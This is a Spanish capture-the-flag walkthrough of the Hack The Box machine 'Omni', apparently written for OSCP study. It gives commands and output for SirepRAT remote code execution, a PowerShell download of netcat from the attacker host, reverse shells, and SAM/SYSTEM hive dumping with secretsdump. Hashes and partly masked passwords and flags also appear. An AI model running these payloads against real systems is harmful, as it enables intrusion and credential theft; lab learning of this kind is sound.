OSCP Path ~ Omni de Hack The Box (Necesario VIP)
Lame ~ Hack The Box to OSCP
Realizamos el Primer escaneo con Nmap
$" nmap -p- --open -sS --min-rate 4000 -vvv -n -Pn -oG allports 10.10.10.204 "
Procedemos con el siguiente escaneo de Nmap
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
5985/tcp open upnp Microsoft IIS httpd
8080/tcp open upnp Microsoft IIS httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm= "Windows Device Portal"
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
29817/tcp open unknown
29819/tcp open arcserve ARCserve Discovery
29820/tcp open unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port29820-TCP:V=7.91%I=7%D=9/3%Time=61327E98%P=x86_64-pc-linux-gnu%r(NU
SF:LL,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(GenericLines,10,"\
SF:*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(Help,10,"\*LY\xa5\xfb`\x04
SF:G\xa9m\x1c\xc9}\xc8O\x12")%r(JavaRMI,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc
SF:9}\xc8O\x12");
Service Info: Host: PING; OS: Windows; CPE: cpe:/o:microsoft:windows
Buscamos que es el servicio ‘Windows Device Portal’ y concatenamos ‘exploit’ en la busqueda:
Intrusion apartir del SirepRAT → Windows Device Portal RCE
Lanzamos el siguiente comando en el exploit SireRAT para copiarnos el nc64.exe de nuestra maquina atacante a la maquina victima en la ruta ‘C:\Windows\Temp’
# python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "powershell" --args " -c iwr -uri http://10.10.16.4/nc64.exe -OutFile C:\Windows\Temp\nc64.exe"
Una vez subido, vamos a proceder a ejecutarnos una R-Shell con nuestro binario nc64.exe
┌──(root💀kali)-[/home/…/HTB/Onmi/nmap/SirepRAT]
└─# python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "powershell" --args " /c C:\Windows\Temp\nc64.exe -e cmd 10.10.16.4 443"
Nos ponemos a la escucha y procedemos a Recibir la conexion:
# rlwrap nc -vlnp 443 1 ⚙
listening on [any] 443 ...
connect to [10.10.16.4] from (UNKNOWN) [10.10.10.204] 49670
Microsoft Windows [Version 10.0.17763.107]
Copyright (c) Microsoft Corporation. All rights reserved.
echo %USERNAME%
echo %USERNAME%
omni$
C:\windows\system32>
Enumeramos la maquina en busca de la flag de User.txt
Directory of C:\Data\Users\app
07/04/2020 09:53 PM <DIR> .
07/04/2020 09:53 PM <DIR> ..
07/04/2020 07:28 PM <DIR> 3D Objects
07/04/2020 07:28 PM <DIR> Documents
07/04/2020 07:28 PM <DIR> Downloads
07/04/2020 07:28 PM <DIR> Favorites
07/04/2020 08:20 PM 344 hardening.txt
07/04/2020 08:14 PM 1,858 iot-admin.xml
07/04/2020 07:28 PM <DIR> Music
07/04/2020 07:28 PM <DIR> Pictures
07/04/2020 09:53 PM 1,958 user.txt
07/04/2020 07:28 PM <DIR> Videos
3 File(s) 4,160 bytes
9 Dir(s) 4,692,770,816 bytes free
Intentamos leer la flag
type user.txt
type user.txt
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>System.Management.Automation.PSCredential</T>
<T>System.Object</T>
</TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N="UserName">flag</S>
<SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb010000009e131d78fe272140835db3caa288536400000000020000000000106600000001000020000000ca1d29ad4939e04e514d26b9706a29aa403cc131a863dc57d7d69ef398e0731a000000000e8000000002000020000000eec9b13a75b6fd2ea6fd955909f9927dc2e77d41b19adde3951ff936d4a68ed750000000c6cb131e1a37a21b8eef7c34c053d034a3bf86efebefd8ff075f4e1f8cc00ec156fe26b4303047cee7764912eb6f85ee34a386293e78226a766a0e5d7b745a84b8f839dacee4fe6ffb6bb1cb53146c6340000000e3a43dfe678e3c6fc196e434106f1207e25c3b3b0ea37bd9e779cdd92bd44be23aaea507b6cf2b614c7c2e71d211990af0986d008a36c133c36f4da2f9406ae7</SS>
</Props>
</Obj>
</Objs>
Vemos que nos arroja System.Management.Automation.PSCredential
Esto nos indica que la credencial o el archivo esta protegido por cifrado. Como vemos en nuestra tty no podemos listar nuestro privilegios.
Para ver si tenemos privilegios intentamos crearnos una carpeta que se llame Temp en la /raiz
Como vemos que si nos deja vamos a intentar extraer dos archivos para intentar sacar los hashes NTLM de la maquina LOCAL
- Comanndo 1:
"reg save HKLM\system system.backup"
reg save HKLM\system system.backup
The operation completed successfully.
- Comando 2:
"reg save HKLM\sam sam.backup"
reg save HKLM\sam sam.backup
The operation completed successfully.
Procedemos a ver si hemos obtenido correctamente los dos archivos
dir
dir
Volume in drive C is MainOS
Volume Serial Number is 3C37-C677
Directory of C:\Temp
09/04/2021 12:11 PM <DIR> .
09/04/2021 12:11 PM <DIR> ..
09/04/2021 12:11 PM 36,864 sam.backup
09/04/2021 12:11 PM 15,044,608 system.backup
2 File(s) 15,081,472 bytes
2 Dir(s) 569,507,840 bytes free
Una vez lo tenemos listos en la carpeta Temp, procedemos a crearnos un Recurso Compàrtido para desde la maquina victima crear una unidad Logica ‘X’ y pasarnos los archivos sam y system.
# impacket-smbserver smbFolder $(pwd) -smb2support -username k1pro -password kipro123
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.204,49671)
[*] AUTHENTICATE_MESSAGE (\k1pro,omni)
[*] User omni\k1pro authenticated successfully
[*] k1pro:::aaaaaaaaaaaaaaaa:1bf4952080b8f957e528c6bd9afd2749:01010000000000008074c46d86a1d70158fdbda39821fcc30000000001001000560045006f0065007400510067006b0003001000560045006f0065007400510067006b00020010004b00790043006e005000460069004700040010004b00790043006e005000460069004700070008008074c46d86a1d701060004000200000008003000300000000000000000000000004000001f7d024059ddf8ec166fe62db294b53f23d6aa04a28753a1a1b0458cb31644420a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e003400000000000000000000000000
[*] Connecting Share(1:IPC$)
[*] Connecting Share(2:smbFolder)
[*] Disconnecting Share(1:IPC$)
Procedemos a Crear la Unidad Logica X: que este sincronizada a nuestro recurso compartido a nivel de Red y copiamos los dos archivos.
net use x: \\10.10.16.4\smbFolder /user:k1pro kipro123
net use x: \\10.10.16.4\smbFolder /user:k1pro kipro123
The command completed successfully.
copy system.backup x:\system
copy system.backup x:\system
1 file(s) copied.
copy system.backup x:\sam
copy system.backup x:\sam
1 file(s) copied.
Una vez los tenemos.. vamos a hacer uso de la herramienta secretsdump.py
# secretsdump.py -system system.backup -sam sam.backup LOCAL
Impacket v0.9.24.dev1+20210827.162957.5aa97fa7 - Copyright 2021 SecureAuth Corporation
[*] Target system bootKey: 0x4a96b0f404fd37b862c07c2aa37853a5
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a01f16a7fa376962dbeb29a764a06f00:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:330fe4fd406f9d0180d67adb0b0dfa65:::
sshd:1000:aad3b435b51404eeaad3b435b51404ee:91ad590862916cdfd922475caed3acea:::
DevToolsUser:1002:aad3b435b51404eeaad3b435b51404ee:1b9ce6c5783785717e9bbb75ba5f9958:::
app:1003:aad3b435b51404eeaad3b435b51404ee:e3cb0651718ee9b4faffe29XXXXXXXX:::
[*] Cleaning up...
Probamos a tirar de RainbowTables en la pagina web de CrackStation y sacamos la siguiente Credencial:
USER: app , PASS: mesh5XXX
Escalando Privilegios al User App
Procedemos a apuntar a la pagina web por el puerto 8080 Nos conectamos al CMS http://10.10.10.204:8080/
Miramos los apartados del CMS vemos/seleccionamos:
processes --
run comand -- echo %USERNAME% --> App
C:\Temp\nc64-exe -e cmd 10.10.16.4 443
No tenemos acceso desde nuestro nc64.exe almacenado en Windows\Temp → lo movemos a esta ruta \Temp Nos compartimos en un servidor con python3 el archivo nc64.exe para alojarlo.
python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput –return_output –cmd “powershell” –args “ -c iwr -uri http://10.10.16.4/nc64.exe -OutFile C:\Temp\nc64.exe”
<HResultResult | type: 1, payload length: 4, HResult: 0x0> `` Conseguimos acceso como el usuario App
C:\windows\system32> dir
Volume in drive C is MainOS
Volume Serial Number is 3C37-C677
Directory of C:\Data\Users\app
07/04/2020 09:53 PM <DIR> .
07/04/2020 09:53 PM <DIR> ..
07/04/2020 07:28 PM <DIR> 3D Objects
07/04/2020 07:28 PM <DIR> Documents
07/04/2020 07:28 PM <DIR> Downloads
07/04/2020 07:28 PM <DIR> Favorites
07/04/2020 08:20 PM 344 hardening.txt
07/04/2020 08:14 PM 1,858 " iot-admin.xml "
07/04/2020 07:28 PM <DIR> Music
07/04/2020 07:28 PM <DIR> Pictures
07/04/2020 09:53 PM 1,958 " user.txt "
07/04/2020 07:28 PM <DIR> Videos
3 File(s) 4,160 bytes
9 Dir(s) 4,692,705,280 bytes free
PowerShell SS(Secure Strings)
Procedemos a lanzarnos una PowerShell para visualizar la flag que esta securizada
powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Attempting to perform the InitializeDefaultDrives operation on the 'FileSystem' provider failed.
" (Import-CliXml -Path user.txt).GetNetworkCredential().password " --> Importante de Recordar
" (Import-CliXml -Path user.txt).GetNetworkCredential().password "
7cfd50f6bc34db3204898fxxxxxxxxxxxxxxx
PS C:\Data\Users\app>
Sacando la informacion del archivo iot-admin.xml
(Import-CliXml -Path IoT-admin.xml).GetNetworkCredential().password
_1nt3rn37ofTh1nxx
Sacamos las credenciales del usuario Administrator:
administrator: _1nt3rn37ofTh1nGz
Procedemos a hacer el mismo procedimiento para el usuarios Administrator.
Nos volvemos a conectar al CMS como Administrator
Ejecutamos el comando : en el CMS
C:\Temp\nc64.exe -e cmd 10.10.16.4 443
Recibimos la conexion como el user Administrator
# rlwrap nc -vlnp 443
listening on [any] 443 ...
connect to [10.10.16.4] from (UNKNOWN) [10.10.10.204] 49685
Microsoft Windows [Version 10.0.17763.107]
Copyright (c) Microsoft Corporation. All rights reserved.
echo %USERNAME%
echo %USERNAME%
Administrator
Procedemos a enumerar para encontrar la flag de root.txt
Directory: C:\Data\Users\administrator
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 7/3/2020 11:23 PM 3D Objects
d-r--- 7/3/2020 11:23 PM Documents
d-r--- 7/3/2020 11:23 PM Downloads
d----- 7/3/2020 11:23 PM Favorites
d-r--- 7/3/2020 11:23 PM Music
d-r--- 7/3/2020 11:23 PM Pictures
d-r--- 7/3/2020 11:23 PM Videos
-ar--- 7/4/2020 9:48 PM 1958" root.txt "
Lanzamos otra vez na PowerShell para sacar la flag del root.txt
" (Import-CliXml -Path root.txt).GetNetworkCredential().password "
" (Import-CliXml -Path root.txt).GetNetworkCredential().password "
5dbdce5569e2c47xxxxxxxxxxxx6e9bf11d
Maquina Rootead =) K0Hack